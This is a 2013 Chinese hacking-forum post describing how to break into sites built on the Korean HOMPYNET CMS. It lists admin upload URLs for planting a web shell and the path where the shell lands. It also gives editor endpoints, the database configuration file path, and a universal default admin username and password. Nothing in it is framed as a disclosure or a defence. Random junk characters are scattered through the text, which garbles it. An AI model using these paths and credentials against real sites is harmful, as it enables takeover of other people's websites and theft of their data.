找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2300|回复: 0
打印 上一主题 下一主题

韩国HOMPYNET CMS漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:12:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
上传漏洞  :
2 C) a( K/ ]( S' j% n" |9 `5 W7 l. D' S! d; e0 ~! q7 u$ M
http://www.xxx.com/admin/image_a ... p;iname=&iform=; t5 `) Z, Q) g
7 l. z+ f5 y1 @  f) H  p) |
http://www.xxx.com/admin/image_a ... p;iname=&iform=
# I% U# O$ x5 y. Q* E5 W' X
" _! K8 s  H. |/ t' Z上传后路径:
3 ]& B* @3 ~% D1 b* r! @2 ~5 p: Z2 s
  R) ?% L9 m0 L- V1 W7 Z, Thttp://www.xxx.com/bis_web_page/images/shell.php.en4 w" P5 H7 f. g. p
+ Z+ ]7 h' L0 f% y# J0 t5 V
编辑器:, z7 O1 ~2 a2 [+ O8 l( U. s) m% y$ ]

! D! \1 U' q' V" Xhttp://www.xxx.com/admin/editor/SWE.php
1 ]5 I4 S5 I" ^. u
! M1 R( W! P# L  ghttp://www.xxx.com/program/editor/SWE.php
& w& _3 e$ w8 ^* F; d  v  ^  _
4 I+ g5 Q8 O$ |. ]% A数据配置文件路径:
& }, T3 u) o9 ^7 j6 Y' m& T
& a  h- Z. U+ U$ @http://www.xxx.com/m_config/DATA/g_setting.php
) [' e& {) v' t4 I5 O. f8 ~' X) l+ z9 c: |0 w3 M0 a
此程序通用后台账号 :gamsiw  php99
- ~1 N" [! I* S9 n
+ N! V0 o2 f7 b' W% q- @
2 b: x" s1 a3 o  ]% Z4 M. _
0 O$ J2 u2 k9 N8 ?: G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表